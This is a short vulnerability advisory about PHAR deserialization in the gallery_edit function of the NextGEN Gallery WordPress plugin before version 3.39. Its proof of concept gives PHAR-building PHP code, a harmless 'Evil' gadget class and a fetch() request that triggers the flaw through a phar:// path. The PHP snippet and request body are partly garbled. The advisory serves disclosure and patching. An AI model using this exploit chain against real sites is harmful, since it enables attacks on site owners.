NextGEN Gallery < 3.39 - Admin+ PHAR Deserialization

Description The plugin is vulnerable to PHAR Deserialization due to a lack of input parameter validation in the gallery_edit function, allowing an attacker to access arbitrary resources on the server.

PoC

1. Ensure your WordPress installation is using PHP version 7.4 or earlier. 2. Create a Gallery and note its ID. 3. Create a poc.phar file using the following code, and add it to the root directory of the server: startBuffering(); $phar->addFromString( ‘test.txt’, ‘text’ ); $phar->setStub( ‘’ ); $phar->setMetadata( new Evil() ); $phar->stopBuffering(); echo “$pharFile successfully created” . PHP_EOL; } catch (Exception $e) { echo $e->getMessage(); } 4. Add the following code to the server to simulate a gadget: class Evil { function __wakeup() { die(‘Arbitrary deserialization’); } } 5. Run the following code in your browser to see the deserialization occur, replacing ADMIN_USERNAME, ADMIN_PASSWORD, and GALLERY_ID accordingly. await (await fetch(“/index.php”, { “credentials”: “include”, “headers”: { “Content-Type”: “application/x-www-form-urlencoded; charset=UTF-8” }, “body”: ‘photocrati_ajax=1&action;=enqueue_nextgen_api_task_list&q;=ADMIN_USERNAME&z;=ADMIN_PASSWORD&app;_config={}&task;_list=[{“type”:“gallery_edit”,“query”:{“id”:“GALLERY_ID”},“object”:{“image_list”:[{“action”:“upload”,“data_key”:“a”,“filename”:“xxxxxxx.jpg”}]}}]&extra;_data={“a”:{“tmp_name”:“phar://poc.phar/tmp.png”}}’, “method”: “POST”, “mode”: “cors” })).text();